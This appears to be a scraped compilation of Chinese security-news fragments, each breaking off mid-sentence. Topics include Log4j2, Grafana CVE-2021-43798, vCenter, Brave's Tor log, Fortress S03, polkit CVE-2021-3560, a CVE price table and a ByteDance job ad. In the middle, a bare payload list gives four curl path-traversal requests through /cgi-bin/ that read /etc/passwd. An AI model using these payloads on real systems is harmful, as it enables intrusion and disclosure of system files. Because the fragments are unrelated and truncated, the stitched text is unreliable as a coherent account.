2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。漏洞描述Apache Log4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。漏洞评级Apache Log4j 远

漏洞描述Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日，国外安全研究人员披露Grafana中某些接口在提供静态文件时，攻击者通过构造恶意请求，可造成目录遍历，读取系统上的文件。阿里云应急响应中心提醒 Grafana 用户尽快采取安全措施阻止漏洞攻击。漏洞评级CVE-2021-43798 Grafana 任意文件读取漏洞 高危漏洞细节漏洞PoC漏洞EXP在野利用公开公开公开存在影响版本Grafana 8.x 系列安全建议截止北京时间2021年12月7日，官方尚未发布新版

有效载荷：curlhttp://host:Port/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
curlhttp://host:Port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
curlhttp://host:Port/cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
curlhttp://host:Port/cgi-bin/.%2%65/.%2%65/.%2%65/.%2%65/etc/passwd

VMware 已针对其 vCenter Server 中的几个严重漏洞发布了修复程序，其中包括一个严重的任意文件上传漏洞，攻击者可以轻松地远程利用该漏洞。该漏洞 (CVE-2021-22005) 存在于 vCenter Server 的 6.5、6.7 和 7.0 版本中，VMware 鼓励运行受影响版本的客户尽快更新。“这个漏洞的后果是严重的，在公开可用的漏洞利用之前，它是时间问题——可能是在披露后几分钟，”该公告称。“随着勒索软件的威胁迫在眉睫，最安全的立场是假设攻击者可能已经通过使用网络钓鱼或鱼叉式网络钓鱼等技术控制了桌面和用户帐户，并采取相应行动。这意味着攻击者可

已创建BaseTemp漏洞0dayTodayExp修正CTICVE2021-09-094.03.8Apple iOS/iPadOS Lock Screen 信息公开$5k-$25k$5k-$25kNot DefinedOfficial Fix0.03+CVE-2021-307562021-09-094.03.8Apple macOS Lock Screen 信息公开$0-$5k$0-$5kNot DefinedOfficial Fix0.00+CVE-2021-307562021-09-094.34.1Apple iOS/iPadOS NFC Tag 弱身份验证$5k-$25k$0-$5kNot DefinedOfficial Fix0.03+CVE-2021-18632021-09-092.42.3Apple iOS/iPadOS Siri Search 信息公开$0-$5k$0-$5kNot DefinedOfficial Fix0.00+CVE-2021-18622021-09-095.55.3Glewlwyd SSO Server

]标题CVE-2021-22929 Brave Browser 1.27 及以下版本将所有 v2 Tor 域的服务器连接时间永久记录到 ~/.config/BraveSoftware/Brave-Browser/tor/data/tor.logCVE IDCVE-2021-22929CVSS 分数待办的内部标识SICK-2021-109产品版本1.27 及以下漏洞详情Brave Browser v1.27 及以下版本中的一个漏洞允许本地或物理攻击者查看用户连接到 v2 洋葱地址的确切时间戳。本地或物理攻击者可以读取 ~/.config/BraveSoftware/Brave-Browser/tor/data/tor.log 识别用户连接到新站点的确切时刻，通过完整的连接时间戳日志轻松地对用户进行三角测量，从而可以

Rapid7 研究员 Arvind Vishwakarma 在 Fortress S03 WiFi 家庭安全系统中发现了多个漏洞。这些漏洞可能导致未经授权访问控制或修改系统行为，以及访问存储或传输中的未加密信息。CVE-2021-39276 描述了CWE-287 的一个实例；具体来说，它描述了一个不安全的云 API 部署，它允许未经身份验证的用户轻松地学习一个秘密，然后可以用来远程更改系统的功能。它的初始 CVSS 分数为5.3（中等）。CVE-2021-39277 描述了CWE-294 的一个实例，一个在射频 (RF) 信号范围内的任何人都可以捕获和重放 RF 信号以改变系统行为的漏洞，初始 CVSS 分数为5.7。

点击上方蓝字“Ots安全”一起玩耍作为我们每月漏洞趋势的一部分，这份报告显示了每月前 10 名的安全漏洞趋势以及黑客、恶意软件和漏洞利用工具包如何利用这些漏洞。为了演示，我们将漏洞趋势值指定为每个漏洞如何显着引起网络安全社区、攻击者以及恶意软件的关注的百分比。在任何一种情况下，公司都可以从该报告中受益，从而获得更多的网络威胁洞察力，并相对预测未来几个月可能针对其公共资产的攻击浪潮。2021 年 6 月，我们看到 Windows Print Spooler 服务引起了网络安全社区的所有关注，因为仅此漏洞就占了 6 月网络安全趋势的一半以上

我们会陆续推出一系列校招和社招职位，给大家进行推荐，今天要推荐的是安全工程师岗位，隶属于安全与风控部门；废话少说，我们上职位！以下岗位忽略工作地点，期望工作地点可以在简历中写明，或者面试时和HR 说明即可！渗透测试工程师 - 安全与风控（北/上/杭/深）内推入口：字节跳动校招内推码: WDBC8M7投递链接: https://job.toutiao.com/s/evFbW69所有校招职位字节跳动校招内推码: WDBC8M7投递链接: https://jobs.toutiao.com/s/epeFrot

上周，GitHub披露了一个易于利用的 Linux 漏洞的详细信息，该漏洞可用于将目标系统的用户权限提升为 root 权限。该漏洞被归类为高危，标记为CVE-2021-3560，影响了许多Linux发行版中默认存在的授权服务polkit。这个安全漏洞是由 GitHub 安全实验室的 Kevin Backhouse 发现的。研究人员发表了一篇博客文章，详细介绍了他的发现和展示该漏洞的视频。本地、无特权的攻击者只需在终端上执行几条命令即可利用此漏洞将其权限提升为root。已确认该漏洞会影响 Red Hat Enterprise Linux、Fedora、Debian 和 Ubuntu 的某些版本。CVE-2021-3560 的补